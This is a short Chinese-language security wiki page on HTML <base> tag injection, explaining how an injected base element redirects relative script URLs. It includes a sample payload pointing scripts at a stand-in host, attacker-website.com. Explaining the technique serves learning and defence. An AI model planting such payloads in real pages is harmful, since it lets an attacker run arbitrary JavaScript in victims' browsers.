base标签注入

概述

HTML <base> 元素指定用于文档中所有相对URL的基础URL。

如果使用了多个 <base> 元素,只有第一个 href 和第一个 target 会被遵守——所有其他的都会被忽略。

相对URL重定向

<base> 标签注入允许将相对URL重定向到任意主机。

例如,对于以下页面,浏览器将从 https://attacker-website.com/assets/some-script.js 请求脚本。

<base href="https://attacker-website.com">

<script src="/assets/some-script.js"></script>

换句话说,如果有办法注入 <base> 标签,就有可能向使用相对URL下载脚本的 <scripts> 元素注入任意JavaScript代码。

上一页HTML注入下一页iframe注入

最后更新于